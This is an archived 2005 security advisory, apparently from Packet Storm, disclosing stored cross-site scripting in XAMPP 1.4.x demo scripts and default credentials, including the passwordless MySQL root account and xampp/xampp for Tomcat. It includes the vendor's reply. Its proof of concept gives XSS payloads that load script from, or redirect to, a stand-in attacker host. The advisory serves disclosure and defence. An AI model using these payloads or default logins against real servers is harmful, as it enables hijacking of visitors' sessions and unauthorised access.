exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Exploit Labs Security Advisory 2005.6

Exploit Labs Security Advisory 2005.6
Posted Apr 18, 2005
Authored by Exploit Labs, Morning Wood | Site exploitlabs.com

XAMPP contains multiple vulnerabilities, including default usernames / passwords and Cross-site scripting issues. Example exploit URLs provided as part of advisory.

tags | exploit, vulnerability, xss
SHA-256 | 1c1cffe32942fde51d981767af0ae64e1987d397b5288232d1cce12aa159380c

Exploit Labs Security Advisory 2005.6

Change Mirror Download
------------------------------------------------------------
- EXPL-A-2005-006 exploitlabs.com Advisory 034 -
------------------------------------------------------------
- XAMPP -



OVERVIEW
========
XAMPP is an easy to install Apache distribution containing MySQL,
PHP and Perl. XAMPP is really very easy to install and to use
- just download, extract and start

http://www.apachefriends.org/en/xampp.html



AFFECTED PRODUCTS
=================
Windows Version 1.4.X
http://www.apachefriends.org/en/xampp-windows.html

Linux 1.4.X ( all )
http://www.apachefriends.org/en/xampp-linux.html

Solaris 0.3 ( all )
http://www.apachefriends.org/en/xampp-solaris.html



DETAILS
=======
1.
persistant XSS is present in user supplied input fields
allowing attackers to render any javascript in the users browser.
some javascript will break the application, disallowing further
user input to the script.

http://[host]/xampp/cds.php
http://[host]/xampp/guestbook-en.pl ( linux )
http://[host]/xampp/phonebook.php



2.
default / install usernames and passwords

by viewing http://[host]/xampp/security.php XAMPP discloses
usernames / passwords ( example below )


Item 2a
-------
The phpMyAdmin user pma has no password UNSECURE
phpMyAdmin saves your preferences in an extra MySQL database. To access
this data
phpMyAdmin uses the special user pma. This user has in the default
installation no
password set and to avoid any security problems you should give him a
passwort.

Item 2b
-------
The MySQL user root has no password UNSECURE
Every local user on Linux box can access your MySQL database with
administrator rights.
You should set a password.

Item 2c
-------
The FTP password for user nobody is still 'lampp' UNSECURE
By using the default password for the FTP user nobody everyone can upload
and change
files for your XAMPP webserver. So if you enabled ProFTPD you should set a
new password
for user nobody.

Item 2d
-------
Tomcat Admin/Config User for XAMPP:
User: xampp
Password: xampp



PROOF OF CONCEPT
=================

Item 1a
--------
http://[host]/xampp/cds.php
enter text...
<script language=JavaScript src=http://evilattacker/js.js></script>

stores values in the mysql database

also 1c

Item 1b
--------
http://[host]/xampp/guestbook-en.pl
see 1c

Item 1c
--------
http://[host]/xampp/phonebook.php
enter into a input field...

<iframe src=http://evilatacker></iframe>

and when rendered forceably redirects the user to http;//evilattacker



SOLUTION
========
none ( see vendor response )

vendor response:
----------------

Dear Donnie!

> you have a severly insecure package.
> here are my raw notes.

Thank you for your notes. But XAMPP is meant only for internal
development usage and not on production systems.

See http://www.apachefriends.org/en/xampp.html
(section "The philosopy")

The vulnerable scripts are only very simple demonstation programms to
test the functions of Apache/MySQL/etc. and to give beginners first
inspirations in programming.
Also this scripts are not meant for public usage.

But you may be right. We should make the warning messages about the
dangers of use for our software bigger.


researcher comment:
-------------------

a disclaimer of this type does not mitigate the security issues
present in XAMPP. this package is targeted at beginners, the very
users who need to be protected the most and taught secure by default.





CREDITS
=======
This vulnerability was discovered and researched by
Donnie Werner of Exploitlabs

Donnie Werner
Information Security Specialist
security@exploitlabs.com

--
web: http://exploitlabs.com
http://exploitlabs.com/files/advisories/EXPL-A-2005-006-xampp.txt
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close